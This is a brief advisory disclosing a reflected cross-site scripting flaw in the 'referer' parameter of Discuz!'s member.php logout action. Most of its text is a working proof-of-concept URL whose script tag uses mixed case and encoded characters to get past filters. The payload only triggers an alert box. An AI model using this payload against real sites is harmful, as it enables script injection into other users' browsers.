Discuz! 'referer' Parameter Cross Site Scripting Vulnerability

Discuz! 'referer' Parameter Cross Site Scripting Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/member.php?action=logout&referer=http://127.0.0.1/1"'><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>